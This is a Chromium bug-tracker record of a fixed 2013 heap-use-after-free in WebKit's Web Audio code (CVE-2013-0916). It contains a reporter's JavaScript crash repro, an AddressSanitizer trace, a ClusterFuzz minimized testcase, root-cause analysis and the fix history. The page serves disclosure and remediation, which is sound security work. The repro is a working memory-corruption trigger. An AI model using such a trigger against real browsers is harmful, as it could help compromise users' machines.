New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 3 users

Issue metadata

Status: Fixed
Owner:
Email to this user bounced
Closed: Mar 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 172342: Heap-use-after-free in WebCore::AudioNodeInput::updateInternalBus

Reported by attek...@gmail.com, Jan 25 2013

Issue description

Tested on:

OS:Ubuntu 12.04
Chromium: 26.0.1394.0 (Developer Build 178763)

Repro-file:

<html>
<script>
var context1= new webkitAudioContext()
var Panner0=context1.createPanner();
var Oscillator10=context1.createOscillator();
var BiquadFilter3=context1.createBiquadFilter();

BiquadFilter3.connect(context1.destination);
BiquadFilter3.frequency.value=961;
Oscillator10.connect(BiquadFilter3);
Panner0.setPosition(135,358,296);
setTimeout(function(){
Panner0.connect(BiquadFilter3);
},1)


setTimeout(function(){location.reload()},2)

</script>
</html>

Test case is little unstable but should crash if you wait for 10s or so.

ASAN-report:

==20758== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0b1dff08c8 at pc 0x7f0b50fd36a2 bp 0x7f0b1c55e1f0 sp 0x7f0b1c55e1e8
READ of size 8 at 0x7f0b1dff08c8 thread T93 (AudioOutputDevic)
    #0 0x7f0b50fd36a1 in WebCore::AudioNodeInput::updateInternalBus() ???:0
    #1 0x7f0b50fdde5e in WebCore::AudioSummingJunction::updateRenderingState() ???:0
    #2 0x7f0b519e456a in WebCore::AudioContext::handleDirtyAudioSummingJunctions() ???:0
    #3 0x7f0b519e436f in WebCore::AudioContext::handlePreRenderTasks() ???:0
    #4 0x7f0b51e1b4f9 in WebCore::AudioDestinationNode::render(WebCore::AudioBus*, WebCore::AudioBus*, unsigned long) ???:0
    #5 0x7f0b5434adad in WebCore::AudioPullFIFO::consume(WebCore::AudioBus*, unsigned long) ???:0
    #6 0x7f0b54152d76 in WebCore::AudioDestinationChromium::render(WebKit::WebVector<float*> const&, WebKit::WebVector<float*> const&, unsigned long) ???:0
.
.
.
freed by thread T93 (AudioOutputDevic) here:
    #0 0x7f0b4d857f02 in operator delete(void*) ??:0
    #1 0x7f0b50fd536b in WebCore::AudioNodeOutput::updateNumberOfChannels() ???:0
    #2 0x7f0b51e1431a in WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput(WebCore::AudioNodeInput*) ???:0
    #3 0x7f0b50fdde5e in WebCore::AudioSummingJunction::updateRenderingState() ???:0
    #4 0x7f0b519e456a in WebCore::AudioContext::handleDirtyAudioSummingJunctions() ???:0
    #5 0x7f0b519e436f in WebCore::AudioContext::handlePreRenderTasks() ???:0
.
.
.
 

Comment 1 by infe...@chromium.org, Jan 25 2013

Cc: crogers@google.com scherkus@chromium.org dalecur...@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 2 by rtoy@chromium.org, Jan 25 2013

In a debug build, this test script causes the assertion:

ASSERTION FAILED: numberOfChannels <= MaxBusChannels
../../third_party/WebKit/Source/WebCore/platform/audio/AudioBus.cpp(57) : WebCore::AudioBus::AudioBus(unsigned int, size_t, bool)

Comment 3 by infe...@chromium.org, Jan 26 2013

Should all of these kind of checks be hard checks in release build, this is the fourth bug near this code that attekett found and since it is reachable so easily by javascript, we should just fix all these out of bounds indicator checks and make them work as hard bailout conditions in release.

Comment 4 by infe...@chromium.org, Jan 31 2013

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta SecSeverity-High OS-All Stability-AddressSanitizer Mstone-24

Comment 5 by cdn@chromium.org, Jan 31 2013

Comment 6 by infe...@chromium.org, Feb 1 2013

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=163216425

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f74ec0e5788
Crash State:
  - crash stack -
  WebCore::AudioNodeInput::updateInternalBus
  WebCore::AudioSummingJunction::updateRenderingState
  - free stack -
  WebCore::AudioNodeOutput::updateNumberOfChannels
  WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=162796:162815

Minimized Testcase (0.37 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv95aaQPlXt0lreKwZg5Fl6-anwR6dYU-e0oIA4IBIXe5QhYDyVBvKQgv6TBUgcHuywce7_JDnbexsY2prslvOWLgZoQNKtStmIlk2VSQVGn63wNdz6jD8cBJ807UNXIuwKxNVLLauNdqnEcekgl1R2a_6lpM7cqVhK8obRbOR0E95f-hoxs
<script>
var context1= new webkitAudioContext()
var Panner0=context1.createPanner();
var Oscillator10=context1.createOscillator();
var BiquadFilter3=context1.createBiquadFilter();

BiquadFilter3.connect(context1.destination);
Oscillator10.connect(BiquadFilter3);
setTimeout(function(){
Panner0.connect(BiquadFilter3);
},1)


setTimeout(function(){location.reload()},2)

</script>

Comment 7 by infe...@chromium.org, Feb 1 2013

Cc: -dalecur...@chromium.org rtoy@chromium.org
Owner: dalecur...@chromium.org
This regressed from http://src.chromium.org/viewvc/chrome?view=rev&revision=162810. Dale, can you please help to take a look.

Comment 8 by dalecur...@chromium.org, Feb 2 2013

Owner: rtoy@chromium.org
WebAudio stuff. over to rtoy.

Comment 9 by parisa@chromium.org, Feb 11 2013

Hey Raymond,

Wanted to followup on this open security bug too (as it relates to Pwnium/Pwn2Own, http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html).

How's this one going?

Comment 10 by infe...@chromium.org, Feb 13 2013

Labels: -Mstone-24 Mstone-25
moving m24 bugs to m25.

Comment 11 by parisa@chromium.org, Feb 26 2013

Just chatted with rtoy@ and he's been trying to debug this one: "It's caused by the code accessing an object that has been deleted.  I haven't figured out who is holding onto the deleted object."

crogers@ any ideas?

Comment 12 by infe...@chromium.org, Feb 27 2013

Cc: james....@intel.com

Comment 13 by infe...@chromium.org, Feb 27 2013

Owner: ----
Status: Available
James.wei@, do you have time to look into this ? We have a hard time tracking this.

Comment 14 by james....@intel.com, Feb 27 2013

Cc: xingnan....@intel.com
inferno, I will have a look into it. 
+xingnan in our team.

Comment 15 by infe...@chromium.org, Feb 27 2013

Cc: -james....@intel.com
Owner: james....@intel.com
Status: Assigned

Comment 16 by infe...@chromium.org, Feb 27 2013

Thanks a lot.

Comment 17 by james....@intel.com, Feb 27 2013

inferno, I believe we found the root cause of this issue. 

It is caused by the AudioBus In-Place optimization.

    // m_actualDestinationBus is set in pull() and will either point to one of our internal busses or to the in-place bus.
    // It must only be changed in the audio thread (or constructor).
    AudioBus* m_actualDestinationBus;

This pointer will store the pointer to the AudioBus in another node when in-place optimization applied, which may be freed when update internal bus.

but in unsigned AudioNodeInput::numberOfChannels() const, this bus is used to get the actual number of output channel. 
        maxChannels = max(maxChannels, output->bus()->numberOfChannels());

Xingnan and me are working on a patch for it.

Comment 18 by infe...@chromium.org, Feb 27 2013

Cc: kbr@chromium.org
Thanks for the quick response james.wei@. I have cced Ken(kbr@) who should be able to review your patch.

Comment 19 by kbr@chromium.org, Feb 27 2013

@crogers is a WebKit reviewer and the principal engineer on Web Audio so he should review it.

Comment 20 by infe...@chromium.org, Mar 1 2013

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
http://trac.webkit.org/changeset/144417

Comment 21 by scarybea...@gmail.com, Mar 1 2013

Labels: reward-topanel
Awesome!! Thanks Xingnan / James / Raymond / Chris / all :)

Comment 22 by scarybea...@gmail.com, Mar 2 2013

Labels: -reward-topanel reward-1000 reward-unpaid
Another $1000 !!

Comment 23 by ClusterFuzz, Mar 3 2013

Project Member
ClusterFuzz has detected this issue as fixed in range 185533:185684.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=163216425

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f74ec0e5788
Crash State:
  - crash stack -
  WebCore::AudioNodeInput::updateInternalBus
  WebCore::AudioSummingJunction::updateRenderingState
  - free stack -
  WebCore::AudioNodeOutput::updateNumberOfChannels
  WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=162796:162815
Fixed: https://cluster-fuzz.appspot.com/revisions?range=185533:185684

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95aaQPlXt0lreKwZg5Fl6-anwR6dYU-e0oIA4IBIXe5QhYDyVBvKQgv6TBUgcHuywce7_JDnbexsY2prslvOWLgZoQNKtStmIlk2VSQVGn63wNdz6jD8cBJ807UNXIuwKxNVLLauNdqnEcekgl1R2a_6lpM7cqVhK8obRbOR0E95f-hoxs

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 24 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -SecSeverity-High -Stability-AddressSanitizer -Mstone-25 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High M-25 Type-Bug-Security Performance-Memory-AddressSanitizer

Comment 25 by scarybea...@gmail.com, Mar 12 2013

Labels: -Merge-Approved -M-25 Merge-Merged M-26 Release-0
M26: http://trac.webkit.org/changeset/145456

Comment 26 by parisa@chromium.org, Mar 14 2013

Labels: -reward-unpaid reward-inprocess

Comment 27 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 28 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 29 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 30 by scarybea...@gmail.com, Mar 23 2013

Labels: CVE-2013-0916

Comment 31 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 32 by bugdroid1@chromium.org, Apr 5 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 33 by parisa@chromium.org, Jun 10 2013

Labels: -reward-inprocess

Comment 34 by jsc...@chromium.org, Nov 18 2013

Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Comment 35 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 38 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 39 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment